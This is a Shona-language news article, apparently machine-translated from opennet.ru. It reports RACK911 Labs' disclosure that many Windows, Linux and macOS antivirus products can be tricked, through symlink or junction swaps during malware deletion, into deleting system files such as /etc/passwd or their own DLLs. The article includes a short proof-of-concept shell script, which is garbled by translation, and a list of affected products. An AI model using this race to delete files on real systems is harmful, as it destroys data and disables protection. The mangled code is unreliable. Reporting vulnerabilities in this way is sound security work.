Vatsvagiri kubva kuRACK911 Labs kuti angangoita ese antivirus mapakeji eWindows, Linux uye macOS aive panjodzi yekurwiswa achinyengedza mamiriro erudzi panguva yekudzimwa kwemafaira umo malware akaonekwa.
Kuti uite kurwisa, unofanirwa kuisa faira iyo antivirus inoona seyakashata (semuenzaniso, unogona kushandisa siginecha yekuyedza), uye mushure meimwe nguva, mushure mekunge antivirus yaona iyo yakaipa faira, asi pakarepo isati yadaidza basa racho. kuti uibvise, chinja dhairekitori nefaira rine chinongedzo chekufananidzira. PaWindows, kuti uwane mhedzisiro yakafanana, dhairekitori inotsiva inoitwa uchishandisa dhairekitori junction. Dambudziko nderekuti anenge ese maantivirus haana kunyatso tarisa zvinongedzo zvekufananidzira uye, vachitenda kuti vari kudzima faira rakashata, vakadzima faira mudhairekitori iro rekufananidzira rinonongedza.
MuLinux uye macOS inoratidzwa sei nenzira iyi mushandisi asina rombo anogona kudzima /etc/passwd kana chero imwe system faira, uye muWindows raibhurari yeDDL yeantivirus pachayo kuvhara basa rayo (muWindows kurwiswa kunongogumira kudzima chete. mafaira asiri kushandiswa nemamwe maapplication parizvino). Semuenzaniso, munhu anorwisa anogona kugadzira dhairekitori re "exploit" uye oisa EpSecApiLib.dll faira ine test virus siginicha mairi, uye otsiva "exploit" dhairekitori ne link "C:\Program Files (x86)\McAfee\ Endpoint Security\Endpoint Securityβ usati wadzima Platform", izvo zvinozotungamira mukubviswa kweraibhurari yeEpSecApiLib.dll kubva pakatalogi yeantivirus. MuLinux uye macos, hunyengeri hwakafanana hunogona kuitwa nekutsiva dhairekitori ne "/ etc" link.
#! / bin / sh
rm -rf /home/user/exploit; mkdir / kumba/mushandisi/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O/home/user/exploit/passwd
while inotifywait -m β/home/user/exploit/passwdβ | grep -m 5 "Vhura"
do
rm -rf /home/user/exploit; ln -s /etc/home/user/exploit
nokuita
Uyezve, zvirongwa zvakawanda zveantivirus zveLinux uye macOS zvakawanikwa zvichishandisa mazita efaira anofanotaurwa kana uchishanda nemafaira echinguvana mu/tmp uye/private/tmp madhairekitori, ayo anogona kushandiswa kukwidziridza ropafadzo kumushandisi wemidzi.
Parizvino, matambudziko akatogadziriswa nevazhinji vatengesi, asi zvakakosha kuti zviziviso zvekutanga nezve dambudziko zvakatumirwa kune vanogadzira mukudonha kwe2018. Kunyangwe vasiri vese vatengesi vakaburitsa zvigadziriso, vakapihwa ingangoita mwedzi mitanhatu yekuisa chigamba, uye RACK6 Labs inotenda kuti ikozvino yakasununguka kuburitsa pachena kusasimba. Zvinocherechedzwa kuti RACK911 Labs yanga ichishanda pakuona kusasimba kwenguva yakareba, asi yanga isingatarisire kuti zvingave zvakaoma kushanda nevamwe kubva kuindasitiri yeantivirus nekuda kwekunonoka kuburitsa zvigadziriso uye nekuregeredza kukosha kwekukurumidza kugadzirisa kuchengetedzwa. matambudziko.
Zvigadzirwa zvakakanganiswa (yemahara antivirus package ClamAV haina kunyorwa):
- Linux
- BitDefender GravityZone
- Comodo Endpoint Chengetedzo
- Eset File Server Chengetedzo
- F-Yakachengeteka Linux Chengetedzo
- Kaspersy Endpoint Kuchengetedzwa
- McAfee Endpoint Kuchengetedzwa
- Sophos Anti-Virus yeLinux
- Windows
- Avast Yemahara Anti-Virus
- Avira Yemahara Anti-Virus
- BitDefender GravityZone
- Comodo Endpoint Chengetedzo
- F-Yakachengeteka Komputa Kudzivirirwa
- FireEye Endpoint Kuchengetedzwa
- Bvisa X (Sophos)
- Kaspersky Endpoint Kuchengetedzwa
- Malwarebytes yeWindows
- McAfee Endpoint Kuchengetedzwa
- Panda dome
- Webroot Yakachengeteka Kwese
- macOS
- AVG
- BitDefender Yese Kuchengeteka
- Eset Chengetedzo Yekuchengetedza
- Kaspersky Internet Security
- McAfee Total Protection
- Microsoft Dziviriro (BETA)
- Norton Security
- Sophos Home
- Webroot Yakachengeteka Kwese
Source: opennet.ru